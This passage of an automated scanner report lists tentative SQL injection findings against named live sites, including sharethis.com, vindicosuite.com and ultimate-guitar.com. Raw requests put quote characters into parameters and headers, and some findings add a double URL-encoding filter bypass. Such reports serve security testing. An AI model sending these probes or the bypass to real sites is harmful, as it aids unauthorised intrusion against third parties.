Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==; __uset=yes

Response 2

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 13:50:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62

getPubGA_onSuccess({"status":"SUCCESS","data":{"domain":[]}});
1.13. http://wd.sharethis.com/api/getApi.php [publisher parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wd.sharethis.com
Path:   /api/getApi.php

Issue detail

The publisher parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the publisher parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /api/getApi.php?return=json&cb=getPubGA_onSuccess&service=getPublisherDomains&publisher=null' HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.cf465dc001621acac71bcb1a36056e40.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==; __uset=yes

Response 1

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 13:50:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 112

getPubGA_onSuccess({"status":"FAILURE","statusMessage":"Failed to load publisher domains","statusNumber":null});

Request 2

GET /api/getApi.php?return=json&cb=getPubGA_onSuccess&service=getPublisherDomains&publisher=null'' HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.cf465dc001621acac71bcb1a36056e40.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==; __uset=yes

Response 2

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 13:50:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62

getPubGA_onSuccess({"status":"SUCCESS","data":{"domain":[]}});
1.14. http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector.asp [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://web.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Feeds/Generator/2.0/GetAdDirector.asp?disableCap=1&rotationId=SM_Twix_InBannerVideo HTTP/1.1
Host: web.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; ASPSESSIONIDAQRQQTSS=DFJNNOLBDKJPGFEBCIAFJKKI

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/xml
Date: Sat, 19 Mar 2011 14:45:47 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQABDDDBD=KBNHGACCNMNBEBHCKOMDBKJA; path=/
X-Powered-By: ASP.NET
Content-Length: 250
Connection: keep-alive

An error occurred on the server when processing the URL. Please contact the system administrator. <p/> If you are the system administrator please click <a href="http://go.microsoft.com/fwlink/?LinkID=
...[SNIP]...

Request 2

GET /Feeds/Generator/2.0/GetAdDirector.asp?disableCap=1&rotationId=SM_Twix_InBannerVideo HTTP/1.1
Host: web.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; ASPSESSIONIDAQRQQTSS=DFJNNOLBDKJPGFEBCIAFJKKI

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml
Date: Sat, 19 Mar 2011 14:45:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQADSABCA=GHPIEGLBDAAABDNKCNEHLBED; path=/
X-Powered-By: ASP.NET
Content-Length: 10632
Connection: keep-alive

<AdDirector><advertisement><rotationItemId>264EF1DB-A02F-46C6-803A-3AB995D15773</rotationItemId><type>GATEWAY</type><name><![CDATA[Digitas_TwixTrade_2011_JanToMarch / SpecificMedia - Mars_TwixPause_15
...[SNIP]...
1.15. http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://web.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector.asp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Feeds/Generator/2.0/GetAdDirector.asp?disableCap=1&rotationId=SM_Twix_InBannerVideo HTTP/1.1
Host: web.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://broadent.vo.llnwd.net/o2/subaccount/BroadbandEnterprises/Web/CDE/Player/RichMedia/V2_234x60/AdPlayer_6_NEW.swf?disableCap=1&rotationName=SM_Twix_InBannerVideo&debug=NO&mute=YES
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; ASPSESSIONIDAQRQQTSS=DFJNNOLBDKJPGFEBCIAFJKKI

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/xml
Date: Sat, 19 Mar 2011 14:45:44 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQCBRBTRT=LFAIMPOBCBADPDCFICEFBEBB; path=/
X-Powered-By: ASP.NET
Content-Length: 250
Connection: keep-alive

An error occurred on the server when processing the URL. Please contact the system administrator. <p/> If you are the system administrator please click <a href="http://go.microsoft.com/fwlink/?LinkID=
...[SNIP]...

Request 2

GET /Feeds/Generator/2.0/GetAdDirector.asp?disableCap=1&rotationId=SM_Twix_InBannerVideo HTTP/1.1
Host: web.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://broadent.vo.llnwd.net/o2/subaccount/BroadbandEnterprises/Web/CDE/Player/RichMedia/V2_234x60/AdPlayer_6_NEW.swf?disableCap=1&rotationName=SM_Twix_InBannerVideo&debug=NO&mute=YES
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; ASPSESSIONIDAQRQQTSS=DFJNNOLBDKJPGFEBCIAFJKKI

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml
Date: Sat, 19 Mar 2011 14:45:42 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCBAADCB=KIELIOBCOLOJAGBMKGOLOPEK; path=/
X-Powered-By: ASP.NET
Content-Length: 10632
Connection: keep-alive

<AdDirector><advertisement><rotationItemId>264EF1DB-A02F-46C6-803A-3AB995D15773</rotationItemId><type>GATEWAY</type><name><![CDATA[Digitas_TwixTrade_2011_JanToMarch / SpecificMedia - Mars_TwixPause_15
...[SNIP]...
1.16. http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector.asp [rotationId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://web.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector.asp

Issue detail

The rotationId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rotationId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Feeds/Generator/2.0/GetAdDirector.asp?disableCap=1&rotationId=SM_Twix_InBannerVideo' HTTP/1.1
Host: web.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://broadent.vo.llnwd.net/o2/subaccount/BroadbandEnterprises/Web/CDE/Player/RichMedia/V2_234x60/AdPlayer_6_NEW.swf?disableCap=1&rotationName=SM_Twix_InBannerVideo&debug=NO&mute=YES
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; ASPSESSIONIDAQRQQTSS=DFJNNOLBDKJPGFEBCIAFJKKI

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/xml
Date: Sat, 19 Mar 2011 14:44:54 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCASAADAC=ECKLFGCCCLOGDOBPEKJCFDLE; path=/
X-Powered-By: ASP.NET
Content-Length: 250
Connection: keep-alive

An error occurred on the server when processing the URL. Please contact the system administrator. <p/> If you are the system administrator please click <a href="http://go.microsoft.com/fwlink/?LinkID=
...[SNIP]...

Request 2

GET /Feeds/Generator/2.0/GetAdDirector.asp?disableCap=1&rotationId=SM_Twix_InBannerVideo'' HTTP/1.1
Host: web.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://broadent.vo.llnwd.net/o2/subaccount/BroadbandEnterprises/Web/CDE/Player/RichMedia/V2_234x60/AdPlayer_6_NEW.swf?disableCap=1&rotationName=SM_Twix_InBannerVideo&debug=NO&mute=YES
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; ASPSESSIONIDAQRQQTSS=DFJNNOLBDKJPGFEBCIAFJKKI

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml
Date: Sat, 19 Mar 2011 14:45:04 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQDTRBQR=BFDCIDBCBKDPLIFLIOGGHMLB; path=/
X-Powered-By: ASP.NET
Content-Length: 25
Connection: keep-alive

<AdDirector></AdDirector>
1.17. http://www.ultimate-guitar.com/about/job.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /about/job.htm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about/job.htm' HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:59:17 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
<h1>Error</h1>
...[SNIP]...

Request 2

GET /about/job.htm'' HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 19 Mar 2011 13:59:17 GMT
Content-Type: text/html
Connection: close
Content-Length: 49123

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>ULTIMATE GUITAR TABS ARCHIVE | 300,000+ Guitar Tabs, Bass Tabs, Chords and G
...[SNIP]...
1.18. http://www.ultimate-guitar.com/bands/t.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /bands/t.htm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bands/t.htm' HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:59:00 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
<h1>Error</h1>
...[SNIP]...

Request 2

GET /bands/t.htm'' HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:59:00 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
1.19. http://www.ultimate-guitar.com/modules/rss/all_updates.xml.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /modules/rss/all_updates.xml.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /modules/rss/all_updates.xml.php?1'=1 HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:54:31 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
<h1>Error</h1>
...[SNIP]...

Request 2

GET /modules/rss/all_updates.xml.php?1''=1 HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 19 Mar 2011 13:54:31 GMT
Content-Type: text/html
Connection: close
Location: http://www.ultimate-guitar.com/modules/rss/all_updates.xml
Content-Length: 0

1.20. http://www.ultimate-guitar.com/search/suggest.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /search/suggest.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /search/suggest.php%2527 HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:59:20 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
<h1>Error</h1>
...[SNIP]...

Request 2

GET /search/suggest.php%2527%2527 HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 19 Mar 2011 13:59:21 GMT
Content-Type: text/html
Connection: close
Content-Length: 49123

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>ULTIMATE GUITAR TABS ARCHIVE | 300,000+ Guitar Tabs, Bass Tabs, Chords and G
...[SNIP]...
1.21. http://www.ultimate-guitar.com/xtra/click_contest.php [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /xtra/click_contest.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /xtra/click_contest.php?ug_from=main&url=http://app.ultimate-guitar.com/ugt/iphone/ HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:54:37 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
<h1>Error</h1>
...[SNIP]...

Request 2

GET /xtra/click_contest.php?ug_from=main&url=http://app.ultimate-guitar.com/ugt/iphone/ HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 302 Found
Server: nginx
Date: Sat, 19 Mar 2011 13:54:37 GMT
Content-Type: text/html
Connection: close
Location: http://app.ultimate-guitar.com/ugt/iphone/
Content-Length: 0

1.22. http://www.ultimate-guitar.com/xtra/click_contest.php [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /xtra/click_contest.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /xtra/click_contest.php?1'=1 HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:54:29 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
<h1>Error</h1>
...[SNIP]...

Request 2

GET /xtra/click_contest.php?1''=1 HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 19 Mar 2011 13:54:30 GMT
Content-Type: text/html
Connection: close
Content-Length: 0

Report generated by XSS.CX at Sat Mar 19 09:55:48 CDT 2011.